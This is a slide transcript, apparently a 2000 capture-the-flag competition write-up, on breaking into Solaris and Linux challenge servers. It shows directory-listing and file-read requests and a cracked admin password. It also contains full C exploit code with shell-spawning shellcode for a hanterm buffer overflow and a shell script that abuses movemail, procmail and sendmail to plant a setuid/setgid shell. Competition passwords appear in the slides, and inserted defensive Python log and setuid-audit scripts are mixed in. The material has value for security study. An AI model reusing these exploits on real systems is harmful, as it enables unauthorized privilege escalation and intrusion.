
1 st OlymFair Workshop Hacking technique


Presentation Transcript


  1. 1st OlymFair Workshop Hacking technique Taeho Oh ohhara@4dl.com ohhara@postech.edu http://postech.edu/~ohhara

  2. Contents • How to pass level 1 • How to pass level 2 • Why did many hackers spend so much time on level 2? • About level 3 • Conclusion

  3. How to pass level 1 (1) • What to do? • Execute /cgi-bin/data/idaccess.cgi and get the way to go to level 2

  4. How to pass level 1 (2) • Level 1 servers • 203.227.243.161 • 203.227.243.162 • 203.227.243.163

  5. How to pass level 1 (3) • 203.227.243.161 • OS: Solaris 8 • Open TCP ports: 80, 8080

  6. How to pass level 1 (4) • 203.227.243.162 • OS: HPUX 11.0 • Open TCP ports: 22, 80, 8080

  7. How to pass level 1 (5) • 203.227.243.163 • OS: MS Windows 2000 • Open TCP ports: 7, 9, 13, 17, 19, 25, 80, 135, 139, 443, 1025, 1026, 1032, 1723, 3389

  8. How to pass level 1 (6) • Attack 203.227.243.161 • 80: Apache Web Server • 8080: Netscape Enterprise Server • The web servers on 80 and 8080 share the same httpd home directory • Netscape Enterprise Server has a security bug

  9. How to pass level 1 (7) • Netscape Enterprise Server security bug • I could see the files in a specific directory with a request like the one below • http://203.227.243.161/?wp-cs-dump • You can also use ?wp-ver-info, ?wp-html-rend, ?wp-usr-prop, ?wp-ver-diff, ?wp-verify-link, ?wp-start-ver, ?wp-stop-ver, and ?wp-uncheckout • I could browse the directories and check whether files existed

  10. How to pass level 1 (8) • The file list
       /
       +----- cgi-bin/
       |      +----- data/          (can't access this directory)
       |      +----- hackme/
       |             +----- a
       |             +----- a.c
       |             +----- show_file.html
       |             +----- showfile.cgi
       +----- data/
       +----- index.html

  11. How to pass level 1 (9) • Read .htaccess file with showfile.cgi • http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htaccess • Read .htpasswd file from .htaccess with showfile.cgi • http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htpasswd

  12. How to pass level 1 (10) • I could crack the encrypted password from .htpasswd with Crack • id:password = admin:banana • I could access /cgi-bin/data directory with this id and password

  13. How to pass level 1 (11) • I could get the way to go to level 2 • http://203.227.243.161/data/idaccess.html • This page is the form that executes http://203.227.243.161/cgi-bin/data/idaccess.cgi • My serial number • KOR000321-961829513 • My password • oD8YEuqYySWogKSQQsOY00zoAjUkxtv7

  14. How to pass level 1 (12) • Netscape Enterprise Server directory indexing vulnerability • See http://www.securityfocus.com/vdb/bottom.html?vid=1063

  15. How to pass level 1 (13) • Netscape Enterprise Server directory indexing vulnerability patch information
       The Directory Indexing feature can be turned off via the Administration Interface. Selecting Content Management -> Document Preferences and changing Directory Indexing to "none" will disable this feature. Also, manually editing the file obj.conf will do the same. Conduct a search for the following:
           Service method="(GET|HEAD)" type="magnus-internal/directory" fn="index-common"
       and replace fn="index-common" with fn="send-error".
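From the defender's side, both level-1 steps leave a clear trace in the web server's access log: the Netscape Enterprise Server ?wp-* commands from slide 9 and showfile.cgi requests for .htaccess/.htpasswd from slide 11. The Python below is an added example (not part of the presentation) that flags both patterns in Common Log Format lines; the sample log lines and the 10.0.0.x client addresses are constructed, and the function names are mine.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Netscape Enterprise Server "wp-" commands listed on slide 9.
WP_TOKENS = {
    "wp-cs-dump", "wp-ver-info", "wp-html-rend", "wp-usr-prop", "wp-ver-diff",
    "wp-verify-link", "wp-start-ver", "wp-stop-ver", "wp-uncheckout",
}
# Files a file-read CGI such as showfile.cgi should never be asked for.
SENSITIVE = {".htaccess", ".htpasswd"}

# Common Log Format: client ident user [time] "METHOD target HTTP/x" status size
CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                 r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(line):
    """Return (client_ip, finding) for one access-log line, or None."""
    m = CLF.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # keep_blank_values keeps a bare "?wp-cs-dump" (no "=") as a query key.
    params = parse_qs(parts.query, keep_blank_values=True)
    for key in params:
        if key in WP_TOKENS:
            return (m.group("ip"), "nes-wp-command:" + key)
    if parts.path.endswith("/showfile.cgi"):
        for name in params.get("NAME", []):
            # unquote once more so a double-encoded %252E does not slip past.
            if unquote(name).rsplit("/", 1)[-1] in SENSITIVE:
                return (m.group("ip"), "showfile-sensitive-read:" + name)
    return None

def scan(lines):
    """Run classify() over an iterable of log lines and return the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log (client IPs are made up); the requests mirror slides 9 and 11.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Jun/2000:13:40:01 +0900] "GET /index.html HTTP/1.0" 200 512',
    '10.0.0.9 - - [30/Jun/2000:13:41:12 +0900] "GET /?wp-cs-dump HTTP/1.0" 200 2048',
    '10.0.0.9 - - [30/Jun/2000:13:42:30 +0900] "GET /cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htpasswd HTTP/1.0" 200 97',
    '10.0.0.9 - - [30/Jun/2000:13:43:02 +0900] "GET /cgi-bin/hackme/showfile.cgi?NAME=show_file.html HTTP/1.0" 200 300',
    '10.0.0.9 - - [30/Jun/2000:13:44:09 +0900] "GET /cgi-bin/hackme/showfile.cgi?NAME=%2Fcgi-bin%2Fdata%2F%252Ehtaccess HTTP/1.0" 200 140',
]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```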

  16. How to pass level 2 (1) • What to do? • Execute /home/forbidden/pass.cgi • The file is owned by root • Its group is wizard • Its permission is 0510 • So the wizard gid is needed to execute /home/forbidden/pass.cgi

  17. How to pass level 2 (2) • Level 2 server • 203.227.243.164 • OS: Linux • Open TCP ports: 23, 81

  18. How to pass level 2 (3) • Wizard setuid or setgid files
       -r-sr-xr-x 1 wizard wizard 26309 Jan 4 09:40 /sbin/pwdb_chkpwd
       -rwsr-sr-x 1 wizard wizard 47692 Mar 29 1999 /sbin/dump
       -rwsr-xr-x 1 wizard wizard 10708 Apr 20 1999 /sbin/cardctl
       -rws--x--x 1 wizard wizard 6148 May 15 1999 /usr/X11R6/bin/Xwrapper
       -rws--x--x 1 wizard wizard 158180 May 14 1999 /usr/X11R6/bin/hanterm
       -rwsr-xr-x 1 wizard wizard 33120 Mar 22 1999 /usr/bin/at
       -rwsr-xr-x 1 wizard wizard 3208 Mar 23 1999 /usr/bin/disable-paste
       -r-sr-x--- 1 wizard wizard 42652 Aug 31 1999 /usr/bin/inndstart
       -r-sr-x--- 1 wizard wizard 40060 Aug 31 1999 /usr/bin/startinnfeed
       -r-sr-sr-x 1 wizard wizard 15816 Jan 7 07:41 /usr/bin/lpq
       -r-sr-sr-x 1 wizard wizard 15608 Jan 7 07:41 /usr/bin/lpr
       -r-sr-sr-x 1 wizard wizard 16248 Jan 7 07:41 /usr/bin/lprm

  19. How to pass level 2 (4) • Wizard setuid or setgid files (Cont.)
       -rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/suidperl
       -rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/sperl5.00503
       -rwsr-sr-x 1 wizard wizard 64468 Apr 7 1999 /usr/bin/procmail
       -rwsr-xr-x 1 wizard wizard 14036 Apr 16 1999 /usr/bin/rcp
       -rwsr-xr-x 1 wizard wizard 10516 Apr 16 1999 /usr/bin/rlogin
       -rwsr-xr-x 1 wizard wizard 7780 Apr 16 1999 /usr/bin/rsh
       -rwxr-sr-x 1 wizard wizard 17832 May 14 1999 /usr/lib/emacs/20.3/i386-redhat-linux/movemail
       -rwsr-sr-x 1 wizard wizard 299364 Apr 20 1999 /usr/sbin/sendmail
       -rwsr-xr-x 1 wizard wizard 16488 Mar 23 1999 /usr/sbin/traceroute
       -rwsr-xr-x 1 wizard wizard 18040 Jan 8 05:24 /usr/sbin/userhelper
       -rwxr-sr-x 1 wizard wizard 3860 Apr 20 1999 /sbin/netreport
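Slide 16 says pass.cgi needs only the wizard gid, so an administrator auditing this host wants to know which world-executable binaries hand out the wizard uid, the wizard gid, or both; those are the bits that need a justification or removal. The Python below is an added example (not from the presentation) that decodes ls -l mode strings, including the s/S and 0550-style cases, and groups the binaries that way; the listing excerpt is copied from slides 18-19, and the function names are mine.

```python
import re

# Excerpt of the wizard setuid/setgid listing from slides 18-19 (verbatim ls -l output).
LISTING = """\
-r-sr-xr-x 1 wizard wizard 26309 Jan 4 09:40 /sbin/pwdb_chkpwd
-rwsr-sr-x 1 wizard wizard 47692 Mar 29 1999 /sbin/dump
-rws--x--x 1 wizard wizard 158180 May 14 1999 /usr/X11R6/bin/hanterm
-rwxr-sr-x 1 wizard wizard 17832 May 14 1999 /usr/lib/emacs/20.3/i386-redhat-linux/movemail
-rwsr-sr-x 1 wizard wizard 64468 Apr 7 1999 /usr/bin/procmail
-r-sr-x--- 1 wizard wizard 42652 Aug 31 1999 /usr/bin/inndstart
-rwxr-sr-x 1 wizard wizard 3860 Apr 20 1999 /sbin/netreport
"""

# ls -l: mode links user group size <3 date tokens> path (paths here contain no spaces).
LS_LINE = re.compile(r"^(?P<mode>[-dl][rwxsStT-]{9}) +\d+ +(?P<user>\S+) +(?P<group>\S+)"
                     r" +\d+ +\S+ +\S+ +\S+ +(?P<path>/\S+)$")

def parse_ls(text):
    """Decode the special bits of each ls -l line; lines that do not parse are skipped."""
    for line in text.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue
        mode = m.group("mode")
        yield {
            "path": m.group("path"), "user": m.group("user"), "group": m.group("group"),
            "setuid": mode[3] in "sS",  # 's': setuid + owner exec, 'S': setuid without exec
            "setgid": mode[6] in "sS",
            "others_exec": mode[9] in "xt",  # runnable from an unrelated account
        }

def privilege_routes(text, owner="wizard"):
    """Group world-executable binaries by the identity they confer (uid, gid or both)."""
    routes = {"uid": [], "gid": [], "uid+gid": []}
    for e in parse_ls(text):
        if not e["others_exec"]:
            continue  # 0550 files such as inndstart are out of reach for the level-2 account
        gives_uid = e["setuid"] and e["user"] == owner
        gives_gid = e["setgid"] and e["group"] == owner
        if gives_uid and gives_gid:
            routes["uid+gid"].append(e["path"])
        elif gives_uid:
            routes["uid"].append(e["path"])
        elif gives_gid:
            routes["gid"].append(e["path"])
    return routes
```

Run against the full listing from both slides, the "gid" bucket is exactly the set of setgid-only programs (movemail, netreport) that slide 36 has in mind when it says level 2 falls to a feature rather than a bug.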

  20. How to pass level 2 (5) • Attack process
       Get level2 shell → Get wizard euid → Get wizard uid → Create wizard uid, gid file → Get wizard gid → Execute pass.cgi

  21. How to pass level 2 (6) • level2 shell → wizard euid • Exploit hanterm bug
       [I have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x240"`
       can't load english font AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
       [I have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x250"`
       Segmentation fault
       [I have no name!@level2 ... ]$

  22. How to pass level 2 (7) • level2 shell → wizard euid (Cont.) • This is a classical buffer overflow bug • I could get a wizard euid shell with a 260-byte buffer and an offset of -450

  23. How to pass level 2 (8) • Exploit code (slides 23-28)
       #include <stdio.h>
       #include <stdlib.h>
       #include <string.h>
       #include <unistd.h>

       #define OFFSET -450
       #define RET_POSITION 260
       #define RANGE 20
       #define NOP 0x90

       char shellcode[1024] =
         "\xeb\x1f"                 /* jmp 0x1f */
         "\x5e"                     /* popl %esi */
         "\x89\x76\x08"             /* movl %esi,0x8(%esi) */
         "\x31\xc0"                 /* xorl %eax,%eax */
         "\x88\x46\x07"             /* movb %eax,0x7(%esi) */
         "\x89\x46\x0c"             /* movl %eax,0xc(%esi) */
         "\xb0\x0b"                 /* movb $0xb,%al */
         "\x89\xf3"                 /* movl %esi,%ebx */
         "\x8d\x4e\x08"             /* leal 0x8(%esi),%ecx */
         "\x8d\x56\x0c"             /* leal 0xc(%esi),%edx */
         "\xcd\x80"                 /* int $0x80 */
         "\x31\xdb"                 /* xorl %ebx,%ebx */
         "\x89\xd8"                 /* movl %ebx,%eax */
         "\x40"                     /* inc %eax */
         "\xcd\x80"                 /* int $0x80 */
         "\xe8\xdc\xff\xff\xff"     /* call -0x24 */
         "/bin/sh";                 /* .string "/bin/sh" */

       unsigned long get_sp(void)
       {
         __asm__("movl %esp,%eax");
       }

       int main(int argc, char **argv)
       {
         char buff[RET_POSITION+RANGE+1], *ptr;
         long *addr_ptr, addr;
         unsigned long sp;
         int offset = OFFSET, bsize = RET_POSITION+RANGE+1;
         int i;

         if (argc > 1)
           offset = atoi(argv[1]);
         sp = get_sp();
         addr = sp - offset;          /* guessed return address: -450 from this stack pointer */
         ptr = buff;
         addr_ptr = (long *)ptr;
         for (i = 0; i < bsize; i += 4)      /* fill the whole buffer with the address */
           *(addr_ptr++) = addr;
         for (i = 0; i < bsize-RANGE*2-strlen(shellcode); i++)
           buff[i] = NOP;                    /* NOP sled in front of the shellcode */
         ptr = buff+bsize-RANGE*2-strlen(shellcode)-1;
         for (i = 0; i < strlen(shellcode); i++)
           *(ptr++) = shellcode[i];
         buff[bsize-1] = '\0';
         execl("/usr/X11R6/bin/hanterm", "hanterm", "-hfn", buff, (char *)0);
         return 0;
       }

  29. How to pass level 2 (14) • wizard euid → wizard uid
       [I have no name!@level2 ... ]$ cat > a.c
       main(){ setreuid(501,501); execl("/bin/sh","sh",0); }
       [I have no name!@level2 ... ]$ gcc a.c ; ./a.out
       [wizard@level2 ... ]$ whoami
       wizard
       [wizard@level2 ... ]$

  30. How to pass level 2 (15) • wizard uid → create wizard uid, gid file • movemail is a wizard setgid program • The file movemail writes gets the wizard gid
       [wizard@level2 ... ]$ echo haha > test1
       [wizard@level2 ... ]$ movemail test1 test2
       [wizard@level2 ... ]$ ls -l test1 test2
       -rw-r--r-- 1 wizard hackers 0 Jul 10 02:03 test1
       -rw-r--r-- 1 wizard wizard 5 Jul 10 02:03 test2
       [wizard@level2 ... ]$ cat test2
       haha

  31. How to pass level 2 (16) • wizard uid, gid file → wizard gid • procmail can execute an arbitrary shell command with the wizard uid and gid when the user can create a file owned by wizard uid and wizard gid

  32. How to pass level 2 (17) • Exploit code (slides 32-34)
       #!/bin/sh
       # assumes the script is run from /tmp: chmod below targets /tmp/shh2
       PATH=${PATH}:/usr/lib/emacs/20.3/i386-redhat-linux
       export PATH
       cat > shh.c << EOF
       int main(){
         setreuid(501,501);
         setregid(501,501);
         execl("/bin/sh","sh",0);
       }
       EOF
       gcc shh.c -o shh
       # movemail (wizard setgid) writes its output file with the wizard gid
       movemail shh shh2
       cat > proc << EOF
       :0
       *
       | /bin/chmod 6777 /tmp/shh2
       EOF
       # the recipe file has to be a wizard uid, gid file, so it is copied with movemail too
       movemail proc /home/wizard/.procmailrc
       echo haha | /usr/sbin/sendmail -OQueueDirectory=/tmp wizard
       sleep 2
       rm -f /home/wizard/.procmailrc
       rm -f ./proc
       rm -f ./exp
       rm -f ./shh.c
       rm -f ./shh
       echo "rm -f ./shh2" | ./shh2

  35. How to pass level 2 (20) • wizard gid → execute pass.cgi
       Congratulation!! You have passed Level 2.
       Your ID : KOR000321-961829513
       Initial Pass Time Stamp : 2000-06-30 13:59:30GMT+9
       IP for Level 3 is 203.227.243.173
       It is protected by ip filtering.
       Please attack and acquire adminstrator's privilege.And then change the index.html under level3 server.
       Level 3 Login ID : level3
       Level 4 Login Passwd : olymfair3

  36. Why did many hackers spend so much time on level 2? (1) • Almost all hackers tried to find a security bug • However, level 2 could be cleared not with a bug but with a feature (except for the hanterm bug)

  37. Why did many hackers spend so much time on level 2? (2) • /sbin/dump has a buffer overflow bug, and no exploit has been released • Many hackers tried to exploit this program. However, exploitation is impossible because the main function never returns: it calls exit(), so an overwritten return address in its frame is never used

  38. Why did many hackers spend so much time on level 2? (3) • The /usr/bin/lprm exploit code generates a segmentation fault message • The segmentation fault message is not generated by /usr/bin/lprm; it is generated by the /usr/bin/lprm exploit code itself. It's a bug in the exploit code.

  39. About level 3 • I spent too much time on level 2, so I had no time to attack level 3 • I tried to scan the level 3 server • However, I couldn't find any open TCP port • I didn't try to attack level 3 after that • It seemed it would take too much time

  40. Conclusion • It was an interesting hacking competition
